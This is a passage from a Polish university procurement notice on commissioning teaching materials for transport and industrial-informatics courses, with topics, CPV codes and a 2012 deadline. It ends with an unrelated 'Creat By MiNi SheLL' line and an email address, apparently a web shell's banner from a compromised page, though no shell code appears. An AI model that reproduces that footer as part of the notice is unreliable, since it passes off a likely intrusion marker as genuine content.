-Niebieska Księga dla projektów i inwestycji związanych z sektorem transportu publicznego.

Całość opracowanych  materiałów dydaktycznych nie przekroczy objętości 10 arkuszy wydawniczych, tj. ok. 180 standardowych stron tekstu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie 8 - opracowanie materiałów dydaktycznych do przedmiotu Techniki symulacyjne w sterowaniu ruchem drogowym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia obejmuje opracowanie materiałów dydaktycznych dla studentów studiów stacjonarnych II stopnia nowej specjalności Systemy informatyczne transportu kierunku Transport. 

2.Szczegółowy zakres materiałów dydaktycznych:
-Zbiory i sterowanie rozmyte, zastosowania w sterowaniu ruchem drogowym 
-Analiza danych o ruchu drogowym z wykorzystaniem teorii zbiorów przybliżonych 
-Zastosowania sztucznych sieci neuronowych w transporcie 
-Metaheurystyki i optymalizacja kombinatoryczna 
-Algorytmy genetyczne w rozwiązywaniu problemów transportowych 
-Algorytmy mrówkowe, znajdowanie optymalnej trasy w sieci transportowej 
-Optymalizacja zagadnień transportowych metodą symulowanego wyżarzania

Całość opracowanych  materiałów dydaktycznych nie przekroczy objętości 10 arkuszy wydawniczych, tj. ok. 180 standardowych stron tekstu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zadanie 9 - opracowanie materiałów dydaktycznych dla słuchaczy kursu Systemy telematyki i zarządzania transportem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia obejmuje opracowanie materiałów dydaktycznych dla uczestników kursu specjalistycznego  Systemy telematyki i zarządzania transportem.

2.Szczegółowy zakres materiałów dydaktycznych:
-Konfiguracja połączenia sieciowego wykorzystującego protokół IP
-Media przewodowe i osprzęt sieci komputerowej
-Transmisja pakietowa i konfiguracja Routera
-Instalacja i konfiguracja bezprzewodowej sieci LAN (zabezpieczenia)
-Oprogramowanie komunikacyjne sieci bezprzewodowej; IRDA, Bluetooth
-Zastosowania protokołu FTP
-Projektowanie struktury sieci lokalnej
-Zarządzanie i optymalizacja sieci lokalnej
-Serwer jako element aktywny sieci 
-Standardy komunikacji dla urządzeń transportu
-Zarządzanie serwerami aplikacji transportu
-Komunikacja bazą danych 

Całość opracowanych  materiałów dydaktycznych nie przekroczy objętości 10 arkuszy wydawniczych, tj. ok. 180 standardowych stron tekstu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zadanie 10 - opracowanie materiałów dydaktycznych dla słuchaczy kursu Międzynarodowy standard branży lotniczej IRIS.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia obejmuje opracowanie materiałów dydaktycznych dla uczestników kursu specjalistycznego Międzynarodowy standard branży lotniczej IRIS.

2.Szczegółowy zakres materiałów dydaktycznych:
-Międzynarodowy Standard Zarządzania Przedsiębiorstwem IRIS - wymagania ogólne i stan wdrażania na świecie
-Przedstawienie charakterystyki i wymagań ogólnych standardu IRIS na bazie najnowszego dokumentu  rew. 02
-Przedstawienie aktualnego stanu wdrożeń i wymagań rynku branży kolejowej
-Określenie zasad funkcjonowania przedsiębiorstwa po jego wdrożeniu
-Międzynarodowy Standard Zarządzania Przedsiębiorstwem IRIS - wymagania szczegółowe
-Omówienie podstaw działania najtrudniejszych procedur RAMS/LCC, analizy ryzyka metodą FMEA i innych wprowadzonych przez IRIS
-Analiza ryzyka metodą FMEA z punktu widzenia producenta i przewoźnika kolejowego
-Wstęp, definicje i przedstawienie ogólnych zasad zarządzania ryzykiem
-Klasyfikacja metod zarządzania ryzykiem
-Szczegółowe przedstawienie zasad analizy ryzyka metodą FMEA Rozszerzenie metody FMEA do pFMEA, FMCEA
-Różnice w analizie ryzyka metodą FMEA dla producenta i przewoźnika

Całość opracowanych  materiałów dydaktycznych nie przekroczy objętości 6 arkuszy wydawniczych, tj. ok. 108 standardowych stron tekstu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zadanie 11 - opracowanie materiałów dydaktycznych do przedmiotu Przetwarzanie i wizualizacja danych przemysłowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia obejmuje opracowanie materiałów dydaktycznych dla studentów studiów II stopnia nowego kierunku Informatyka przemysłowa. 

2.Szczegółowy zakres materiałów dydaktycznych:
-	Charakterystyka danych przemysłowych.
-	Cele wizualizacji, sposoby i cele przetwarzania danych.
-	Przegląd gotowych rozwiązań przemysłowych służących do wizualizacji danych przemysłowych.
-	Ogólna architektura i omówienie poszczególnych modułów pakietu wizualizacji danych Wonderware.
-	Opis architektury rozwiązania Archestr-A.
-	Wizualizacja danych z wykorzystaniem oprogramowania In Touch.
-	Podstawowe kontrolki graficzne, animacje, kojarzenie kontrolek ze zmiennymi, alarmy, skrypty w programie In Touch.
-	 Serwery danych i ich konfiguracja, komunikacja sterowników Fanuc i Horner z programem In Touch.
-	Opis interfejsu użytkownika platformy Archestr-A.
-	Podstawowe obiekty platformy Archestr-A, ich zadania i konfiguracja.
-	Omówienie składowych obiektów, definiowanie skryptów, definiowanie własnych procedur.
-	Tworzenie przykładowej aplikacji wizualizacyjnej, metody śledzenie poprawności działania.
-	Pobieranie danych ze sterownika do platformy Archestr-A.
-	Kojarzenie kontrolek programu In Touch z platformą Archestr-A.

Całość opracowanych  materiałów dydaktycznych nie przekroczy objętości 8 arkuszy wydawniczych, tj. ok. 144 standardowych stron tekstu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Zadanie 12 - opracowanie materiałów dydaktycznych do przedmiotu Serwery bazodanowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia obejmuje opracowanie materiałów dydaktycznych dla studentów studiów II stopnia nowego kierunku Informatyka przemysłowa. 
 
2.Szczegółowy zakres materiałów dydaktycznych:
-instalacja i konfiguracja serwera MS SQL
-tworzenie obiektów baz danych
-konfigurowanie zabezpieczeń w MS SQL
-polecenia SQL DML
-indeksy i widoki 
-definiowanie funkcji użytkownika
-tabele tymczasowe i kursory
-narzędzia monitorujące
-transakcje 
-kopie bezpieczeństwa
-replikacja
-serwery lustrzane
-model danych. Enity Framework 4.0

Całość opracowanych  materiałów dydaktycznych nie przekroczy objętości 8 arkuszy wydawniczych, tj. ok. 144 standardowych stron tekstu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Zadanie 13 - opracowanie materiałów dydaktycznych do przedmiotu Zintegrowane systemy zarządzania.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia obejmuje opracowanie materiałów dydaktycznych dla studentów studiów II stopnia nowego kierunku Informatyka przemysłowa. 

2.Szczegółowy zakres materiałów dydaktycznych:
-charakterystyka i cechy informatycznych systemów zarządzania 
-od MRP do ERP -ewolucja systemów zintegrowanych
-przykłady systemów zintegrowanych
-MS Enterprises Dynamic System- zasada działania, podstawowe moduły 
-planowanie i harmonogramowanie produkcji 
-implementacja programowa systemów zintegrowanych
-wdrażanie zintegrowanych systemów w przemyśle

Całość opracowanych  materiałów dydaktycznych nie przekroczy objętości 8 arkuszy wydawniczych, tj. ok. 144 standardowych stron tekstu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Zadanie 14 - opracowanie materiałów dydaktycznych do przedmiotu Komputerowa analiza obrazu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia obejmuje opracowanie materiałów dydaktycznych dla studentów studiów II stopnia nowego kierunku Informatyka przemysłowa. 
 
2.Szczegółowy zakres materiałów dydaktycznych:
-	Wprowadzenie do tematyki przetwarzania i analizy obrazu
-	Metody Pozyskiwania obrazów cyfrowych
-	Klasyczne metody komputerowego przetwarzania obrazu
-	Przekształcenia morfologiczne
-	Cechy obrazu
-	Wykrywanie krawędzi
-	Segmentacja obrazu
-	Sprzęt używany w systemach inspekcji jakości
-	Wykrywanie obiektów na podstawie wzorców
-	Wymiarowanie obiektów
-	Klasyfikacja obiektów
-	Zagadnienia wizualnego monitoringu bezpieczeństwa
-	Analiza cech biomedycznych
-	Śledzenie obiektów na obrazie z kamer monitoringu

Całość opracowanych  materiałów dydaktycznych nie przekroczy objętości 6 arkuszy wydawniczych, tj. ok. 108 standardowych stron tekstu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Zadanie 15 - opracowanie materiałów dydaktycznych do przedmiotu Systemy inteligentne i decyzyjne transportu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia obejmuje opracowanie materiałów dydaktycznych dla studentów studiów II stopnia nowej specjalności Systemy Informatyczne Transportu.

2.Szczegółowy zakres materiałów dydaktycznych:
-	Podstawowe pojęcia związane z teorią decyzji i sztuczną inteligencją
-	Inteligentne systemy transportowe, przykładowe rozwiązania
-	Systemy wspomagania decyzji i systemy ekspertowe w transporcie
-	Zbiory i sterowanie rozmyte, zastosowania w sterowaniu ruchem drogowym
-	Analiza danych o ruchu drogowym z wykorzystaniem teorii zbiorów przybliżonych
-	Zastosowania sztucznych sieci neuronowych w transporcie
-	Metaheurystyki i optymalizacja kombinatoryczna 
-	Algorytmy genetyczne w rozwiązywaniu problemów transportowych
-	Algorytmy mrówkowe, znajdowanie optymalnej trasy w sieci transportowej
-	Optymalizacja zagadnień transportowych metodą symulowanego wyżarzania

Całość opracowanych  materiałów dydaktycznych nie przekroczy objętości 6 arkuszy wydawniczych, tj. ok. 108 standardowych stron tekstu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com